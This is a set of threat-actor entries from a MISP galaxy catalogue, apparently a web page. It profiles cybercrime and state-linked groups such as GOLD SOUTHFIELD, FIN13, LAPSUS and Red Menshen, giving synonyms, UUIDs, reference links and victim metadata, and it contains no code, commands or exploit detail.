GOLD MANSARD
GOLD MANSARD is a financially motivated cybercriminal threat group that operated the Nemty ransomware from August 2019. The threat actor behind Nemty is known on Russian underground forums as 'jsworm'. Nemty was operated as a ransomware as a service (RaaS) affiliate program and featured a 'name and shame' website where exfiltrated victim data was leaked. In April 2020, jsworm appeared to acquire new partners and retired the Nemty ransomware. This was followed by the introduction of Nefilim ransomware, which does not operate as an affiliate model. Nefilim has been used in post-intrusion ransomware attacks against organizations in logistics, telecommunications, energy and other sectors.
Internal MISP references
UUID bda575ed-5066-4625-98ef-938bbffddc00
which can be used as unique global reference for GOLD MANSARD
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
GOLD NORTHFIELD
Operational since at least October 2020, GOLD NORTHFIELD is a financially motivated cybercriminal threat group that leverages GOLD SOUTHFIELD's REvil ransomware in their attacks. To do this, the threat actors replace the configuration of the REvil ransomware binary with their own in an effort to repurpose the ransomware for their operations. GOLD NORTHFIELD has given this modified REvil ransomware variant the name 'LV ransomware'.
Internal MISP references
UUID 4c51f24c-90a1-4f22-b932-bd4bb9d488f6
which can be used as unique global reference for GOLD NORTHFIELD
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
GOLD RIVERVIEW
GOLD RIVERVIEW was a financially motivated cybercriminal group that facilitated the distribution of malware- and scam-laden spam email on behalf of its customers. This threat group authored and sold the Necurs rootkit beginning in early 2014, including to GOLD EVERGREEN who integrated it into Gameover Zeus. GOLD RIVERVIEW also operated a global botnet that was colloquially known as Necurs (CraP2P) and was a major source of spam email from 2016 through 2018. Necurs distributed malware such as GOLD DRAKE's Dridex (Bugat v5), GOLD BLACKBURN's TrickBot, and other families like Locky and FlawedAmmy. Necurs also distributed a large volume of email pushing securities 'pump and dump' scams, rogue pharmacies, and fraudulent dating sites. On March 4, 2019 all three active segments of the Necurs botnet ceased operation and have not since resumed. On March 10, 2020 Microsoft took civil action against GOLD RIVERVIEW and made technical steps that would complicate the threat actors' ability to reconstitute the botnet.
Internal MISP references
UUID 3806516d-151b-4869-88bc-1f2a2cb73c3c
which can be used as unique global reference for GOLD RIVERVIEW
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
GOLD SKYLINE
GOLD SKYLINE is a financially motivated cybercriminal threat group operating from Nigeria engaged in high-value wire fraud facilitated by business email compromise (BEC) and spoofing (BES). Also known as Wire-Wire Group 1 (WWG1), GOLD SKYLINE has been active since at least 2016 and relies heavily on compromised email accounts, social engineering, and increasingly malware to divert inter-organization funds transfers.
Internal MISP references
UUID dcb6b056-7a1b-484c-82ee-f3962d47bcd9
which can be used as unique global reference for GOLD SKYLINE
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
GOLD SOUTHFIELD
GOLD SOUTHFIELD is a financially motivated cybercriminal threat group that authors and operates the REvil (aka Sodinokibi) ransomware on behalf of various affiliated threat groups. Operational since April 2019, the group obtained the GandCrab source code from GOLD GARDEN, the operators of GandCrab that voluntarily withdrew their ransomware from underground markets in May 2019. GOLD SOUTHFIELD is responsible for authoring REvil and operating the backend infrastructure used by affiliates (also called partners) to create malware builds and to collect ransom payments from victims. CTU researchers assess with high confidence that GOLD SOUTHFIELD is a former GandCrab affiliate and continues to work with other former GandCrab affiliates.
Internal MISP references
UUID 262c8537-1cdb-4297-aa3e-1410164160bf
which can be used as unique global reference for GOLD SOUTHFIELD
in MISP communities and other software using the MISP galaxy
External references
- http://www.secureworks.com/research/threat-profiles/gold-southfield - webarchive
- https://www.secureworks.com/research/revil-sodinokibi-ransomware - webarchive
- https://www.secureworks.com/blog/how-cyber-adversaries-are-adapting-to-exploit-the-global-pandemic - webarchive
- https://www.secureworks.com/blog/revil-the-gandcrab-connection - webarchive
Associated metadata
Metadata key | Value |
---|---|
GOLD SYMPHONY
GOLD SYMPHONY is a financially motivated cybercrime group, likely based in Russia, that is responsible for the development and sale on underground forums of the Buer Loader malware. First discovered around August 2019, Buer Loader is offered as a malware-as-a-service (MasS) and has been advertised by a threat actor using the handle 'memeos'. Customers include GOLD BLACKBURN, the operators of the TrickBot malware. In addition to TrickBot, Buer Loader has been reported to download Cobalt Strike and other tools for use in post-intrusion ransomware attacks.
Internal MISP references
UUID bf151740-b667-4f06-87a1-131c3261cca2
which can be used as unique global reference for GOLD SYMPHONY
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
GOLD WATERFALL
GOLD WATERFALL is a group of financially motivated cybercriminals responsible for the creation, distribution, and operation of the Darkside ransomware. Active since August 2020, GOLD WATERFALL uses a variety of tactics, techniques, and procedures (TTPs) to infiltrate and move laterally within targeted organizations to deploy Darkside ransomware to its most valuable resources. Among these TTPs are using malicious documents delivered by email to establish a foothold and using stolen credentials to access victims' remote access services. In November 2020, the 'darksupp' persona was observed advertising an affiliate program on several semi-exclusive underground forums, marking GOLD WATERFALL's entry into the ransomware-as-a-service (RaaS) landscape.
Internal MISP references
UUID 4d787c58-2581-4696-ad6c-e0e36ed2bac7
which can be used as unique global reference for GOLD WATERFALL
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
GOLD WINTER
GOLD WINTER are a financially motivated group, likely based in Russia, who operate the Hades ransomware. Hades activity was first identified in December 2020 and its lack of presence on underground forums and marketplaces leads CTU researchers to conclude that it is not operated under a ransomware as a service affiliate model. GOLD WINTER do employ name-and-shame tactics, where data is stolen and used as additional leverage over victims, but rather than a single centralized leak site CTU researchers have observed the group using Tor sites customized for each victim that include a Tox chat ID for communication, which also appears to be unique for each victim.
Internal MISP references
UUID 6c514d9d-e2fa-45a5-a938-9a461f69ad2d
which can be used as unique global reference for GOLD WINTER
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
BackdoorDiplomacy
An APT group that we are calling BackdoorDiplomacy, due to the main vertical of its victims, has been targeting Ministries of Foreign Affairs and telecommunication companies in Africa and the Middle East since at least 2017.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular BackdoorDiplomacy.
Known Synonyms |
---|
BackDip |
CloudComputating |
Quarian |
Internal MISP references
UUID 6472be4d-c186-4c86-b3b7-7dc1b4d3a3d8
which can be used as unique global reference for BackdoorDiplomacy
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
cfr-suspected-victims | ['Libya', 'Namibia', 'Sudan', 'Albania', 'Croatia', 'Georgia', 'Poland', 'Iran', 'Qatar', 'Saudi Arabia', 'Sri Lanka', 'Uzbekistan'] |
cfr-target-category | ['Government', 'Telecomms'] |
Gelsemium
The Gelsemium group has been active since at least 2014 and was described in the past by a few security companies. Gelsemium’s name comes from one possible translation ESET found while reading a report from VenusTech who dubbed the group 狼毒草 for the first time. It’s the name of a genus of flowering plants belonging to the family Gelsemiaceae, Gelsemium elegans is the species that contains toxic compounds like Gelsemine, Gelsenicine and Gelsevirine, which ESET choses as names for the three components of this malware family.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Gelsemium.
Known Synonyms |
---|
狼毒草 |
Internal MISP references
UUID 2dd31182-bae1-48ed-8bb3-805a3df89783
which can be used as unique global reference for Gelsemium
in MISP communities and other software using the MISP galaxy
External references
- https://www.welivesecurity.com/2021/06/09/gelsemium-when-threat-actors-go-gardening/ - webarchive
- https://www.venustech.com.cn/uploads/2018/08/231401512426.pdf - webarchive
- https://hitcon.org/2016/pacific/0composition/pdf/1202/1202%20R0%200930%20an%20intelligance-driven%20approach%20to%20cyber%20defense.pdf - webarchive
- https://public.gdatasoftware.com/Presse/Publikationen/Whitepaper/EN/GDATA_TooHash_CaseStudy_102014_EN_v1.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
cfr-suspected-victims | ['North Korea', 'South Korea', 'Japan', 'China', 'Mongolia', 'Egypt', 'Saudi Arabia', 'Yemen', 'Oman', 'Iran', 'Iraq', 'Kuwait', 'Israel', 'Jordan', 'Gaza', 'Syria', 'Turkey', 'Lebanon'] |
cfr-target-category | ['Government', 'Electronics Manufacturers', 'Universities', 'Religious organization'] |
BelialDemon
Mentioned as operator of TriumphLoader and Matanbuchus
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular BelialDemon.
Known Synonyms |
---|
Matanbuchus |
Internal MISP references
UUID e7aff414-fc21-43eb-ad5d-9a46e07be9f5
which can be used as unique global reference for BelialDemon
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
Common Raven
Threat actor Common Raven has been actively targeting financial sector institutions, compromising their SWIFT payment infrastructure to send out fraudulent payments.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Common Raven.
Known Synonyms |
---|
DESKTOP-GROUP |
NXSMS |
OPERA1ER |
Internal MISP references
UUID da581c60-7c3d-4de6-b54c-cafea1c58389
which can be used as unique global reference for Common Raven
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
FIN13
Since 2017, Mandiant has been tracking FIN13, an industrious and versatile financially motivated threat actor conducting long-term intrusions in Mexico with an activity timeframe stretching back as early as 2016. Although their operations continue through the present day, in many ways FIN13's intrusions are like a time capsule of traditional financial cybercrime from days past. Instead of today's prevalent smash-and-grab ransomware groups, FIN13 takes their time to gather information to perform fraudulent money transfers. Rather than relying heavily on attack frameworks such as Cobalt Strike, the majority of FIN13 intrusions involve heavy use of custom passive backdoors and tools to lurk in environments for the long haul.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular FIN13.
Known Synonyms |
---|
Elephant Beetle |
TG2003 |
Internal MISP references
UUID 60fa684d-c738-4b77-98fb-3f6605e2bb82
which can be used as unique global reference for FIN13
in MISP communities and other software using the MISP galaxy
External references
- https://www.mandiant.com/resources/fin13-cybercriminal-mexico - webarchive
- https://blog.sygnia.co/elephant-beetle-an-organized-financial-theft-operation - webarchive
- https://f.hubspotusercontent30.net/hubfs/8776530/Sygnia-%20Elephant%20Beetle_Jan2022.pdf - webarchive
- https://www.netwitness.com/wp-content/uploads/FIN13-Elephant-Beetle-NetWitness.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
country | RU |
SideCopy
The SideCopy APT is a Pakistani threat actor that has been operating since at least 2019, mainly targeting South Asian countries and more specifically India and Afghanistan. Its name comes from its infection chain that tries to mimic that of the SideWinder APT. It has been reported that this actor has similarities with Transparent Tribe (APT36) and possibly is a subdivision of this actor. Cisco Talos and Seqrite have provided comprehensive reports on this actor’s activities.
Internal MISP references
UUID f6d02ac3-3447-4892-b844-1ef31839e04f
which can be used as unique global reference for SideCopy
in MISP communities and other software using the MISP galaxy
External references
- https://www.seqrite.com/blog/operation-sidecopy/ - webarchive
- https://blog.malwarebytes.com/threat-intelligence/2021/12/sidecopy-apt-connecting-lures-to-victims-payloads-to-infrastructure/ - webarchive
- https://www.telsy.com/sidecopy-apt-from-windows-to-nix/ - webarchive
- https://blog.talosintelligence.com/2021/07/sidecopy.html - webarchive
- https://about.fb.com/news/2021/11/taking-action-against-hackers-in-pakistan-and-syria/ - webarchive
- https://sebdraven.medium.com/copy-cat-of-apt-sidewinder-1893059ca68d - webarchive
Associated metadata
Metadata key | Value |
---|---|
country | PK |
Antlion
Antlion is a Chinese state-backed advanced persistent threat (APT) group, who has been targeting financial institutions in Taiwan. This persistent campaign has lasted over the course of at least 18 months.
Internal MISP references
UUID 8482f350-867c-11ec-a8a3-0242ac120002
which can be used as unique global reference for Antlion
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
cfr-suspected-victims | ['Taiwan'] |
cfr-target-category | ['Financial'] |
country | CN |
TA2541
Persistent cybercrime threat actor targeting aviation, aerospace, transportation, manufacturing, and defense industries for years. This threat actor consistently uses remote access trojans (RATs) that can be used to remotely control compromised machines. This threat actor uses consistent themes related to aviation, transportation, and travel. The threat actor has used similar themes and targeting since 2017.
Internal MISP references
UUID a57e5bf5-d7f4-43a1-9c15-8a44cdb95079
which can be used as unique global reference for TA2541
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
TA516
This actor typically distributes instances of the SmokeLoader intermediate downloader, which, in turn, downloads additional malware of the actor’s choice -- often banking Trojans. Figure 3 shows a lure document from a November campaign in which TA516 distributed fake resumes with malicious macros that, if enabled, launch a PowerShell script that downloads SmokeLoader. In this instance, we observed SmokeLoader downloading a Monero coinminer. Since the middle of 2017, TA516 has used similar macro-laden documents as well as malicious JavaScript hosted on Google Drive to distribute both Panda Banker and a coinminer executable via SmokeLoader, often in the same campaigns.
Internal MISP references
UUID 0466bbf1-a187-4b3d-b558-a31e5ca11ea7
which can be used as unique global reference for TA516
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
TA547
TA547 is responsible for many other campaigns since at least November 2017. The other campaigns by the actor were often localized to countries such as Australia, Germany, the United Kingdom, and Italy. Delivered malware included ZLoader (a.k.a. Terdot), Gootkit, Ursnif, Corebot, Panda Banker, Atmos, Mazar Bot, and Red Alert Android malware.
Internal MISP references
UUID 29fbc8d4-1e6e-4edc-9887-bdf47f36e4c1
which can be used as unique global reference for TA547
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
TA554
Since May 2018, Proofpoint researchers have observed email campaigns using a new downloader called sLoad. sLoad is a PowerShell downloader that most frequently delivers Ramnit banker and includes noteworthy reconnaissance features. The malware gathers information about the infected system including a list of running processes, the presence of Outlook, and the presence of Citrix-related files. sLoad can also take screenshots and check the DNS cache for specific domains (e.g., targeted banks), as well as load external binaries. While initial versions of sLoad appeared in May 2018, we began tracking the campaigns from this actor (internally named TA554) since at least the beginning of 2017.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular TA554.
Known Synonyms |
---|
TH-163 |
Internal MISP references
UUID 36f1a1b8-e03a-484f-95a3-005345679cbe
which can be used as unique global reference for TA554
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
TA555
Beginning in May 2018, Proofpoint researchers observed a previously undocumented downloader dubbed AdvisorsBot appearing in malicious email campaigns. The campaigns appear to primarily target hotels, restaurants, and telecommunications, and are distributed by an actor we track as TA555. To date, we have observed AdvisorsBot used as a first-stage payload, loading a fingerprinting module that, as with Marap, is presumably used to identify targets of interest to further infect with additional modules or payloads. AdvisorsBot is under active development and we have also observed another version of the malware completely rewritten in PowerShell and .NET.
Internal MISP references
UUID d0d26dae-195f-4503-a6a9-ebb1ec0e07f9
which can be used as unique global reference for TA555
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
TA800
This attacker is an affiliate distributor of the The Trick, also known as Trickbot, and BazaLoader. (For more on how affiliates work, see the description of TA573). TA800 has targeted a wide range of industries in North America, infecting victims with banking Trojans and malware loaders (malware designed to download other malware onto a compromised device). Malicious emails have often included recipients’ names, titles and employers along with phishing pages designed to look like the targeted company. Lures have included hard-to-resist subjects such as related to payment, meetings, termination, bonuses and complaints in the subject line or body of the email.
Internal MISP references
UUID 75fac2e9-8f2c-4620-a1cc-4b8a61c1bb48
which can be used as unique global reference for TA800
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
MosesStaff
Cybereason Nocturnus describes Moses Staff as an Iranian hacker group, first spotted in October 2021. Their motivation appears to be to harm Israeli companies by leaking sensitive, stolen data.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular MosesStaff.
Known Synonyms |
---|
DEV-0500 |
Marigold Sandstorm |
Moses Staff |
Internal MISP references
UUID d45dd940-b38d-4b2c-9f2f-3e4a0eac841c
which can be used as unique global reference for MosesStaff
in MISP communities and other software using the MISP galaxy
External references
- https://twitter.com/campuscodi/status/1450455259202166799 - webarchive
- https://research.checkpoint.com/2021/mosesstaff-targeting-israeli-companies/ - webarchive
- https://www.cybereason.com/blog/strifewater-rat-iranian-apt-moses-staff-adds-new-trojan-to-ransomware-operations - webarchive
- https://www.fortinet.com/blog/threat-research/guard-your-drive-from-driveguard - webarchive
Associated metadata
Metadata key | Value |
---|---|
country | IR |
Related clusters
To see the related clusters, click here.
Avivore
The group’s existence came to light during Context’s investigation of a number of attacks against multinational enterprises that compromise smaller engineering services and consultancies working in their supply chains.
Internal MISP references
UUID 8045fc09-13d6-4f90-b239-ed5060b9297b
which can be used as unique global reference for Avivore
in MISP communities and other software using the MISP galaxy
External references
- https://www.computerweekly.com/news/252471769/New-threat-group-behind-Airbus-cyber-attacks-claim-researchers - webarchive
- https://www.contextis.com/en/news/context-identifies-new-avivore-threat-group - webarchive
- https://web.archive.org/web/20191208223958/https://www.contextis.com/en/blog/avivore - webarchive
Associated metadata
Metadata key | Value |
---|---|
country | CN |
HAZY TIGER
The Bitter threat group initially started using RAT tools in their campaigns, as the first Bitter versions, for Android released in 2014 were based on the AndroRAT framework. Over time, they switched to a custom version that has been known as BitterRAT ever since.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular HAZY TIGER.
Known Synonyms |
---|
APT-C-08 |
Bitter |
Orange Yali |
T-APT-17 |
Internal MISP references
UUID 1e9bd6fe-e009-41ce-8e92-ad78c73ee772
which can be used as unique global reference for HAZY TIGER
in MISP communities and other software using the MISP galaxy
External references
- https://www.bitdefender.com/files/News/CaseStudies/study/352/Bitdefender-PR-Whitepaper-BitterAPT-creat4571-en-EN-GenericUse.pdf - webarchive
- https://mp.weixin.qq.com/s/8j_rHA7gdMxY1_X8alj8Zg - webarchive
- https://www.pwc.com/gx/en/issues/cybersecurity/cyber-threat-intelligence/cyber-year-in-retrospect/yir-cyber-threats-report-download.pdf - webarchive
- https://www.bsi.bund.de/DE/Themen/Unternehmen-und-Organisationen/Cyber-Sicherheitslage/Analysen-und-Prognosen/Threat-Intelligence/Aktive_APT-Gruppen/aktive-apt-gruppen_node.html - webarchive
Associated metadata
Metadata key | Value |
---|---|
cfr-suspected-victims | ['Germany'] |
country | IN |
LAPSUS
An actor group conducting large-scale social engineering and extortion campaign against multiple organizations with some seeing evidence of destructive elements.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular LAPSUS.
Known Synonyms |
---|
DEV-0537 |
LAPSUS$ |
SLIPPY SPIDER |
Strawberry Tempest |
Internal MISP references
UUID d9e5be22-1a04-4956-af6c-37af02330980
which can be used as unique global reference for LAPSUS
in MISP communities and other software using the MISP galaxy
External references
- https://www.microsoft.com/security/blog/2022/03/22/dev-0537-criminal-actor-targeting-organizations-for-data-exfiltration-and-destruction/ - webarchive
- https://blog.checkpoint.com/2022/03/07/lapsus-ransomware-gang-uses-stolen-source-code-to-disguise-malware-files-as-trustworthy-check-point-customers-remain-protected/ - webarchive
- https://www.crowdstrike.com/adversaries/slippy-spider/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
Related clusters
To see the related clusters, click here.
Scarab
Scarab APT was first spotted in 2015, but is believed to have been active since at least 2012, conducting surgical attacks against a small number of individuals across the world, including Russia and the United States. The backdoor deployed by Scarab in their campaigns is most commonly known as Scieron.
Internal MISP references
UUID ef59014b-79bb-408f-97f1-3c585a240ca7
which can be used as unique global reference for Scarab
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
cfr-suspected-victims | ['Russia', 'Ukraine', 'United States'] |
cfr-type-of-incident | Espionage |
country | CN |
BladeHawk
Internal MISP references
UUID 0d72c57c-73e3-4739-8144-c8055cabd7dc
which can be used as unique global reference for BladeHawk
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
cfr-suspected-victims | ['Kurdistan'] |
cfr-target-category | ['Government'] |
cfr-type-of-incident | Espionage |
Copy-Paste
The title ‘Copy-paste compromises’ is derived from the actor’s heavy use of tools copied almost identically from open source given by The Australian Government.
Internal MISP references
UUID 38d75c89-f243-45ee-87e7-e4675f0c53b3
which can be used as unique global reference for Copy-Paste
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
cfr-suspected-victims | ['Australia'] |
cfr-target-category | ['Government'] |
cfr-type-of-incident | Espionage |
Killnet
A group targeting various countries using Denial of Services attacked.
Internal MISP references
UUID ad2d6946-1ec2-4d77-b864-39980af4e103
which can be used as unique global reference for Killnet
in MISP communities and other software using the MISP galaxy
External references
- https://www.cisa.gov/uscert/ncas/alerts/aa22-110a - webarchive
- https://therecord.media/russia-or-ukraine-hacking-groups-take-sides/?msclkid=235244a7ba6611ec92f21c9bd3b8ee49 - webarchive
- https://www.expats.cz/czech-news/article/pro-russian-hackers-target-czech-websites-in-a-series-of-attacks - webarchive
Associated metadata
Metadata key | Value |
---|---|
cfr-suspected-victims | ['United States', 'Czech Republic'] |
cfr-target-category | ['Government'] |
cfr-type-of-incident | Denial of service |
SaintBear
A group targeting UA state organizations using the GraphSteel and GrimPlant malware.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular SaintBear.
Known Synonyms |
---|
DEV-0587 |
FROZENVISTA |
Lorec53 |
Nascent Ursa |
Nodaria |
Saint Bear |
Storm-0587 |
TA471 |
UAC-0056 |
UNC2589 |
Internal MISP references
UUID c67d3dfb-ab39-46e1-a971-5efdfe6a5b9f
which can be used as unique global reference for SaintBear
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.graphsteel - webarchive
- https://cert.gov.ua/article/38374 - webarchive
- https://blog.malwarebytes.com/threat-intelligence/2022/04/new-uac-0056-activity-theres-a-go-elephant-in-the-room/ - webarchive
- https://www.intezer.com/blog/research/elephant-malware-targeting-ukrainian-orgs/ - webarchive
- https://www.sentinelone.com/blog/threat-actor-uac-0056-targeting-ukraine-with-fake-translation-software/ - webarchive
- https://unit42.paloaltonetworks.com/atoms/nascentursa/ - webarchive
- https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/nodaria-ukraine-infostealer - webarchive
- https://blog.google/threat-analysis-group/fog-of-war-how-the-ukraine-conflict-transformed-the-cyber-threat-landscape/ - webarchive
- https://www.microsoft.com/en-us/security/blog/2023/06/14/cadet-blizzard-emerges-as-a-novel-and-distinct-russian-threat-actor/ - webarchive
- https://circleid.com/posts/20230412-probing-lorec53-phishing-through-the-dns-microscope - webarchive
- https://nsfocusglobal.com/wp-content/uploads/2021/11/Analysis-Report-on-Lorec53-Group.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
country | RU |
UNC3524
Mandiant observed this group operating since December 2019. Its techniques partially overlap with multiple Russian-based espionage actors (APT28 and APT29). They are described as having a high level of operational security, low malware footprint, adept evasive skills, and a large Internet of Things (IoT) device botnet at their disposal.
Internal MISP references
UUID bee8b09c-07e5-4c12-94d6-266ebcb1ec24
which can be used as unique global reference for UNC3524
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
cfr-type-of-incident | Espionage |
Curious Gorge
Curious Gorge, a group TAG attributes to China's PLA SSF, has conducted campaigns against government and military organizations in Ukraine, Russia, Kazakhstan, and Mongolia. The actor has remained active against government, military, logistics and manufacturing organizations in Ukraine, Russia and Central Asia. In Russia, long running campaigns against multiple government organizations have continued, including the Ministry of Foreign Affairs. Over the past week, TAG identified additional compromises impacting multiple Russian defense contractors and manufacturers and a Russian logistics company.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Curious Gorge.
Known Synonyms |
---|
UNC3742 |
Internal MISP references
UUID 6ee284d9-2742-4468-851c-a61366cc9a20
which can be used as unique global reference for Curious Gorge
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
cfr-suspected-victims | ['Ukraine', 'Russia', 'Kazakhstan', 'Mongolia'] |
cfr-target-category | ['Government', 'Military', 'Logistics', 'Defense Contractor'] |
cfr-type-of-incident | Espionage |
country | CN |
Red Menshen
Since 2021, Red Menshen, a China based threat actor, which has been observed targeting telecommunications providers across the Middle East and Asia, as well as entities in the government, education, and logistics sectors using a custom backdoor referred as BPFDoor. This threat actor uses a variety of tools in its post-exploitation phase. This includes custom variants of the shared tool Mangzamel (including Golang variants), custom variants of Gh0st, and open source tools like Mimikatz and Metasploit to aid in its lateral movement across Windows systems. Also, They have been seen sending commands to BPFDoor victims via Virtual Privat Servers (VPSs) hosted at a well-known provider, and that these VPSs, in turn, are administered via compromised routers based in Taiwan, which the threat actor uses as VPN tunnels. Most Red Menshen activity that has been observed took place between Monday to Friday (with none observed on the weekends), with most communication taking place between 01:00 and 10:00 UTC.131 This pattern suggests a consistent 8 to 9-hour activity window for the threat actor, with realistic probability of it aligning to local working hours.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Red Menshen.
Known Synonyms |
---|
Red Dev 18 |
Internal MISP references
UUID bfe66711-32dc-4c1f-b78b-9b2f9e4c1525
which can be used as unique global reference for Red Menshen
in MISP communities and other software using the MISP galaxy
External references
- https://www.pwc.com/gx/en/issues/cybersecurity/cyber-threat-intelligence/cyber-year-in-retrospect/yir-cyber-threats-report-download.pdf - webarchive
- https://www.pwc.com/gx/en/issues/cybersecurity/cyber-threat-intelligence/cyber-year-in-retrospect/yir-cyber-threats-annex-download.pdf - webarchive
- https://troopers.de/troopers22/talks/7cv8pz - webarchive
Associated metadata
Metadata key | Value |
---|---|
cfr-suspected-victims | ['Middle East', 'Asia'] |
cfr-target-category | ['Government', 'Education', 'Logistics'] |
country | CN |
Cosmic Lynx
Cosmic Lynx is a Russia-based BEC cybercriminal organization that has significantly impacted the email threat landscape with sophisticated, high-dollar phishing attacks.
Internal MISP references
UUID 54ae5c75-8aab-41a8-971a-03d53db9b35c
which can be used as unique global reference for Cosmic Lynx
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
cfr-type-of-incident | Business Email Compromise |
ModifiedElephant
Our research into these intrusions revealed a decade of persistent malicious activity targeting specific groups and individuals that we now attribute to a previously unknown threat actor named ModifiedElephant. This actor has operated for years, evading research attention and detection due to their limited scope of operations, the mundane nature of their tools, and their regionally-specific targeting. ModifiedElephant is still active at the time of writing.
Internal MISP references
UUID 6cce6ecc-e6f5-4ae5-b8c5-cf633b7cf973
which can be used as unique global reference for ModifiedElephant
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
cfr-target-category | ['Civil Society'] |
EXOTIC LILY
EXOTIC LILY is a resourceful, financially motivated group whose activities appear to be closely linked with data exfiltration and deployment of human-operated ransomware such as Conti and Diavol. In early September 2021, the group has been obeserved exploiting a 0day in Microsoft MSHTML (CVE-2021-40444). Investigation lead researchers to believe that they are an Initial Access Broker (IAB) who appear to be working with the Russian cyber crime gang known as FIN12 (Mandiant, FireEye) / WIZARD SPIDER (CrowdStrike). This threat actor deploys tactics, techniques and procedures (TTPs) that are traditionally associated with more targeted attacks, like spoofing companies and employees as a means of gaining trust of a targeted organization through email campaigns that are believed to be sent by real human operators using little-to-no automation. Additionally and rather uniquely, they leverage legitimate file-sharing services like WeTransfer, TransferNow and OneDrive to deliver the payload, namely BUMBLEEBEE and BAZARLOADER, further evading detection mechanisms. This level of human-interaction is rather unusual for cyber crime groups focused on mass scale operations.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular EXOTIC LILY.
Known Synonyms |
---|
DEV-0413 |
Internal MISP references
UUID 3ce2a9e0-c435-402a-a7f3-d48b64d1ab9d
which can be used as unique global reference for EXOTIC LILY
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
TA578
TA578, a threat actor that Proofpoint researchers have been tracking since May of 2020. TA578 has previously been observed in email-based campaigns delivering Ursnif, IcedID, KPOT Stealer, Buer Loader, BazaLoader, and Cobalt Strike.
Internal MISP references
UUID d1a8626a-06a5-4ecc-9519-e17fc6724f15
which can be used as unique global reference for TA578
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
TA579
TA579, a threat actor that Proofpoint researchers have been tracking since August 2021. This actor frequently delivered BazaLoader and IcedID in past campaigns.
Internal MISP references
UUID 7ab283ac-b78f-42db-b564-0550b9637b0b
which can be used as unique global reference for TA579
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
RansomHouse
This group started operating during the first quarter of 2022. They published samples of alleged stolen data from companies on their site on Tor. It is unclear if they conducted the attacks themselves, or if they bought leaked databases from third parties.
Internal MISP references
UUID 4d522fad-452c-46be-94ea-5803aec9b709
which can be used as unique global reference for RansomHouse
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
cfr-target-category | ['Private sector'] |
ToddyCat
ToddyCat is responsible for multiple sets of attacks detected since December 2020 against high-profile entities in Europe and Asia. There is still little information about this actor, but its main distinctive signs are two formerly unknown tools that Kaspersky call ‘Samurai backdoor’ and ‘Ninja Trojan’.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular ToddyCat.
Known Synonyms |
---|
Websiic |
Internal MISP references
UUID 091a0b69-74de-44b6-bb12-16b7a8fd078b
which can be used as unique global reference for ToddyCat
in MISP communities and other software using the MISP galaxy
External references
- https://www.bleepingcomputer.com/news/security/new-toddycat-apt-group-targets-exchange-servers-in-asia-europe/ - webarchive
- https://securelist.com/toddycat/106799/ - webarchive
- https://www.welivesecurity.com/2021/03/10/exchange-servers-under-siege-10-apt-groups/ - webarchive
- https://gteltsc.vn/blog/cap-nhat-nhe-ve-lo-hong-bao-mat-0day-microsoft-exchange-dang-duoc-su-dung-de-tan-cong-cac-to-chuc-tai-viet-nam-9685.html - webarchive
- https://community.riskiq.com/article/d8b749f2 - webarchive
